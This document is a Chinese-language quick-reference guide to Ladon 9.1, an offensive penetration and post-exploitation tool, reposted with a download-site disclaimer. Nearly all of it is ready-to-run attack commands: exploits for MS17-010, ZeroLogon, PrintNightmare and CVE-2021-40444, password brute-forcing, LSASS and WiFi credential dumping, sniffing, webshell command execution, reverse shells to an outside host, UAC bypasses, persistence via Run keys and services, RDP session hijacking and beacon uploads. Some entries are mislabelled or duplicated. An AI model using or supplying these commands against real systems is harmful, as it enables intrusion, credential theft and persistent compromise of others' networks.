Ladon 简明使用教程 完整文档: http://k8gege.org/Ladon
支持Cmd、Shell、Cobalt Strike、PowerShell下使用
Windows版本: .Net、Cobalt Strike、PowerShell
全系统版本:GO(全平台)、Python(理论上全平台)
PS: GUI版主要方便本地测试使用,完整功能使用CMD
### 版本
Ladon9.1 20211108
简明用法例子 125模块
### 自定义线程扫描
例子:扫描目标10.1.2段是否存在MS17010漏洞
单线程:Ladon 10.1.2.8/24 MS17010 t=1
80线程:Ladon noping 10.1.2.8/24 MS17010 t=80
在高强度防护下的网络默认线程无法扫描,必须单线程
### Socks5代理扫描
例子:扫描目标10.1.2段是否存在MS17010漏洞(必须加noping)
Ladon noping 10.1.2.8/24 MS17010
详见:http://k8gege.org/Ladon/proxy.html
### 网段扫描
CIDR格式:不只是/24/16/8(所有)
Ladon 192.168.1.8/24 扫描模块
Ladon 192.168.1.8/16 扫描模块
Ladon 192.168.1.8/8 扫描模块
字母格式:仅C段B段A段 顺序排序
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块
### 资产扫描、指纹识别、服务识别、存活主机、端口扫描
##### 001 多协议探测存活主机 (IP、机器名、MAC地址、制造商)
Ladon 192.168.1.8/24 OnlinePC
##### 002 多协议识别操作系统 (IP、机器名、操作系统版本、开放服务)
Ladon 192.168.1.8/24 OsScan
##### 003 扫描存活主机
Ladon 192.168.1.8/24 OnlineIP
##### 004 ICMP扫描存活主机
Ladon 192.168.1.8/24 Ping
##### 005 扫描SMB漏洞MS17010 (IP、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 MS17010
##### 006 SMBGhost漏洞检测 CVE-2020-0796 (IP、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 SMBGhost
##### 007 扫描Web信息/Http服务
Ladon 192.168.1.8/24 WebScan
##### 008 扫描C段站点URL域名
Ladon 192.168.1.8/24 UrlScan
##### 009 扫描C段站点URL域名
Ladon 192.168.1.8/24 SameWeb
##### 010 扫描子域名、二级域名
Ladon baidu.com SubDomain
##### 011 域名解析IP、主机名解析IP
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
##### 012 域内机器信息获取
Ladon AdiDnsDump 192.168.1.8 (Domain IP)
##### 013 扫描C段端口、指定端口扫描
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
##### 014 扫描C段WEB以及CMS(75种Web指纹识别)
Ladon 192.168.1.8/24 WhatCMS
##### 015 扫描思科设备
Ladon 192.168.1.8/24 CiscoScan
Ladon http://192.168.1.8 CiscoScan
##### 016 枚举Mssql数据库主机 (数据库IP、机器名、SQL版本)
Ladon EnumMssql
##### 017 枚举网络共享资源 (域、存活IP、共享路径)
Ladon EnumShare
##### 018 扫描LDAP服务器
Ladon 192.168.1.8/24 LdapScan
##### 019 扫描FTP服务器
Ladon 192.168.1.8/24 FtpScan
### 暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆
密码爆破详解参考SSH:http://k8gege.org/Ladon/sshscan.html
##### 020 445端口 SMB密码爆破(Windows)
Ladon 192.168.1.8/24 SmbScan
##### 021 135端口 Wmi密码爆破(Windowns)
Ladon 192.168.1.8/24 WmiScan
##### 022 389端口 LDAP服务器、AD域密码爆破(Windows)
Ladon 192.168.1.8/24 LdapScan
##### 023 5985端口 Winrm密码爆破(Windowns)
Ladon 192.168.1.8/24 WinrmScan.ini
##### 024 445端口 SMB NTLM HASH爆破(Windows)
Ladon 192.168.1.8/24 SmbHashScan
##### 025 135端口 Wmi NTLM HASH爆破(Windows)
Ladon 192.168.1.8/24 WmiHashScan
##### 026 22端口 SSH密码爆破(Linux)
Ladon 192.168.1.8/24 SshScan
Ladon 192.168.1.8:22 SshScan
##### 027 1433端口 Mssql数据库密码爆破
Ladon 192.168.1.8/24 MssqlScan
##### 028 1521端口 Oracle数据库密码爆破
Ladon 192.168.1.8/24 OracleScan
##### 029 3306端口 Mysql数据库密码爆破
Ladon 192.168.1.8/24 MysqlScan
##### 030 7001端口 Weblogic后台密码爆破
Ladon http://192.168.1.8:7001/console WeblogicScan
Ladon 192.168.1.8/24 WeblogicScan
##### 031 5900端口 VNC远程桌面密码爆破
Ladon 192.168.1.8/24 VncScan
##### 032 21端口 Ftp服务器密码爆破
Ladon 192.168.1.8/24 FtpScan
##### 033 8080端口 Tomcat后台登陆密码爆破
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
##### 034 Web端口 401基础认证密码爆破
Ladon http://192.168.1.8/login HttpBasicScan
##### 035 445端口 Impacket SMB密码爆破(Windowns)
Ladon 192.168.1.8/24 SmbScan.ini
##### 036 445端口 IPC密码爆破(Windowns)
Ladon 192.168.1.8/24 IpcScan.ini
### 漏洞检测/漏洞利用/Poc/Exp
##### 037 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)
Ladon 192.168.1.8/24 MS17010
##### 038 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)
Ladon 192.168.1.8/24 WeblogicPoc
##### 039 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)
Ladon 192.168.1.8/24 PhpStudyPoc
##### 040 ActiveMQ漏洞检测(CVE-2016-3088)
Ladon 192.168.1.8/24 ActivemqPoc
##### 041 Tomcat漏洞检测(CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatPoc
##### 042 Weblogic漏洞利用(CVE-2019-2725)
Ladon 192.168.1.8/24 WeblogicExp
##### 043 Tomcat漏洞利用(CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatExp
##### 044 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
Ladon 192.168.1.8/24 Struts2Poc
### FTP下载、HTTP下载
##### 045 HTTP下载
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
##### 046 Ftp下载
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
### 加密解密(HEX/Base64)
##### 047 Hex加密解密
Ladon 123456 EnHex
Ladon 313233343536 DeHex
##### 048 Base64加密解密
Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64
### 网络嗅探
##### 049 Ftp密码嗅探
Ladon FtpSniffer 192.168.1.5
##### 050 HTTP密码嗅探
Ladon HTTPSniffer 192.168.1.5
##### 051 网络嗅探
Ladon Sniffer
### 密码读取
##### 052 读取IIS站点密码、网站路径
Ladon IISpwd
##### DumpLsass内存密码
Ladon DumpLsass
### 信息收集
##### 053 进程详细信息
Ladon EnumProcess
Ladon Tasklist
##### 054 获取命令行参数
Ladon cmdline
Ladon cmdline cmd.exe
##### 055 获取渗透基础信息
Ladon GetInfo
Ladon GetInfo2
##### 056 .NET & PowerShell版本
Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion
##### 057 运行时版本&编译环境
Ladon Ver
Ladon Version
### 远程执行(psexec/wmiexec/atexec/sshexec)
##### 445端口 加密PSEXEC远程执行命令(交互式)
net user \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
##### 058 135端口 WmiExec远程执行命令 (非交互式)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami (8.2前用法)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami (8.2后用法)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p (8.2后用法)
##### 059 445端口 AtExec远程执行命令(非交互式)
Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami
##### 060 22端口 SshExec远程执行命令(非交互式)
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
##### 061 JspShell远程执行命令(非交互式)
Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
#### 062 WebShell远程执行命令(非交互式)
“`Bash
Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
“`
### 提权降权
##### 063 BypassUac2 绕过UAC执行,支持Win7-Win10
Ladon BypassUac2 c:\1.exe
Ladon BypassUac2 c:\1.bat
##### 064 GetSystem 提权或降权运行程序
Ladon GetSystem cmd.exe
Ladon GetSystem cmd.exe explorer
##### 065 Runas 模拟用户执行命令
Ladon Runas user pass cmd
### 其它功能
##### 066 Win2008一键启用.net 3.5
Ladon EnableDotNet
##### 067 获取内网站点HTML源码
Ladon gethtml http://192.168.1.1
##### 068 检测后门
Ladon CheckDoor
Ladon AutoRun
##### 069 获取本机内网IP与外网IP
Ladon GetIP
##### 070 一键迷你WEB服务器
Ladon WebSer 80
Ladon web 80
列目录
Ladon web 80 dir
获取外网IP(VPS上启动WEB,目标访问ip.txt或ip.jpg)
http://192.168.1.8/ip.txt
### 反弹Shell
##### 071 反弹TCP NC Shell
Ladon ReverseTcp 192.168.1.8 4444 nc
##### 072 反弹TCP MSF Shell
Ladon ReverseTcp 192.168.1.8 4444 shell
##### 073 反弹TCP MSF MET Shell
Ladon ReverseTcp 192.168.1.8 4444 meter
##### 074 反弹HTTP MSF MET Shell
Ladon ReverseHttp 192.168.1.8 4444
##### 075 反弹HTTPS MSF MET Shell
Ladon ReverseHttps 192.168.1.8 4444
##### 076 反弹TCP CMD & PowerShell Shell
Ladon PowerCat 192.168.1.8 4444 cmd
Ladon PowerCat 192.168.1.8 4444 psh
##### 077 反弹UDP Cmd & PowerShell Shell
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
##### 078 RDP桌面会话劫持(无需密码)
Ladon RDPHijack 3
Ladon RDPHijack 3 console
##### 079 OXID定位多网卡主机
Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan
#### 080 查看用户最近访问文件
Ladon Recent
#### 081 添加注册表Run启动项
Ladon RegAuto Test c:\123.exe
#### 082 AT计划执行程序(无需时间)(system权限)
Ladon at c:\123.exe
Ladon at c:\123.exe gui
#### 083 SC服务加启动项&执行程序(system权限)
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName
#### 084 MS16135提权至SYSTEM
Ladon ms16135 whoami
##### 085 BadPotato服务用户提权至SYSTEM
Ladon BadPotato cmdline
##### 086 SweetPotato服务用户提权至SYSTEM
Ladon SweetPotato cmdline
##### 087 whoami查看当前用户权限以及特权
Ladon whoami
##### 088 Open3389一键开启3389
Ladon Open3389
##### 089 RdpLog查看3389连接记录
Ladon RdpLog
##### 090 QueryAdmin查看管理员用户
Ladon QueryAdmin
##### 091 激活内置管理员Administrator
Ladon ActiveAdmin
##### 092 激活内置用户Guest
Ladon ActiveGuest
##### 093 查看本机命名管道
Ladon GetPipe
##### 094 139端口Netbios协议Windows密码爆破
Ladon 192.168.1.8/24 NbtScan
##### 095 5985端口Winrm协议Windows密码爆破
Ladon 192.168.1.8/24 WinrmScan
##### 096 WinrmExec远程执行命令无回显(支持System权限)
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe
##### 097 getstr/getb64/debase64(无回显漏洞回显结果)
监听 Ladon web 800
提交 返回明文
certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
Base64加密结果
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
Base64结果解密
certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw
##### 098 ZeroLogon CVE-2020-1472域控提权(密码置空)
Ladon ZeroLogon dc.k8gege.org
##### 099 CVE-2020-0688 Exchange序列化漏洞(.net 4.0)
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
##### 100 Shiro插件探测
Ladon 192.168.1.8/24 IsShiro
##### 101 网络摄像头密码爆破(内置默认密码)
Ladon 192.168.1.8/24 DvrScan
##### 102 Snmp协议探测操作系统、设备等信息
Ladon 192.168.1.8/24 SnmpScan
##### 103 Nbt协议探测Windows主机名、域、用户
Ladon 192.168.1.8/24 NbtInfo
##### 104 Smb协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 SmbInfo
##### 105 Wmi协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 WmiInfo
##### 106 Mssql协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 MssqlInfo
##### 107 Winrm协议探测Windows版本、主机名、域
Ladon 192.168.1.8/24 WinrmInfo
##### 108 Exchange探测Windows版本、主机名、域
Ladon 192.168.1.8/24 ExchangeInfo
##### 109 Rdp协议探测Windows版本、主机名、域
For单线程: Ladon 192.168.1.8/24 RdpInfo f=1
##### 110 netsh本机888端口转发至112的22端口
Ladon netsh add 888 192.168.1.112 22
##### 111 列目录
Ladon DirList 默认列全盘
Ladon DirList c:\ 指定盘符或目录
##### 112 6种白名单BypassUAC(8.0后)Win7-Win10
用法Ladon BypassUAC Method Base64Cmd
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
##### 113 135端口 WmiExec2远程执行命令 (非交互式)支持文件上传
Usage:
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe
##### 114 ForExec循环漏洞利用(Win10永恒之黑CVE-2020-0796,成功退出以免目标蓝屏)
Ladon ForExec “CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e –load-shellcode test.txt” 80 “Exploit finnished”
##### 115 PrintNightmare (CVE-2021-1675 | CVE-2021-34527)打印机漏洞提权EXP
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
##### 116 445端口 SmbExec Ntlm-Hash非交互式远程执行命令(无回显)
Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
##### 117 USB使用记录查看(USB名称、USB标记、路径信息)
Ladon UsbLog
##### 118 Windows 0day漏洞通用DLL注入执行CMD生成器(DLL仅5KB)
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
##### 119 CVE-2021-40444 微软IE/Office 0day漏洞
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
##### 120 获取PCname GUID CPUID DiskID Mac地址
Ladon GetID
##### 121 读取系统Hash、VPN密码、DPAPI-Key
Ladon CVE-2021-36934
##### 122 读取连接过的WIFI密码
Ladon WifiPwd
##### 123 读取FileZilla FTP密码
Ladon WifiPwd
##### 124 读取连接过的WIFI帐号密码
Ladon FileZillaPwd
##### 125 自定义程序集插件扫描
Ladon 192.168.1.8/24 IsShiro.exe
Ladon 192.168.1.8/24 *.dll(c#)
二、本站提供的所有下载文件均为网络共享资源,请于下载后的24小时内删除。如需体验更多乐趣,还请支持正版。
三、我站提供用户下载的所有内容均转自互联网。如有内容侵犯您的版权或其他利益的,请编辑邮件并加以说明发送到站长邮箱。站长会进行审查之后,情况属实的会在三个工作日内为您删除。
免责声明(WoYaoBa.Com):
本站所发布的一切资源仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。
附: 二○○二年一月一日《计算机软件保护条例》第十七条规定:为了学习和研究软件内含的设计思想和原理,通过安装、显示、传输或者存储软件等方式使用软件的,可以不经软件著作权人许可,不向其支付报酬!鉴于此,也希望大家按此说明研究软件!
注:本站所有资源均来自网络转载,版权归原作者和公司所有.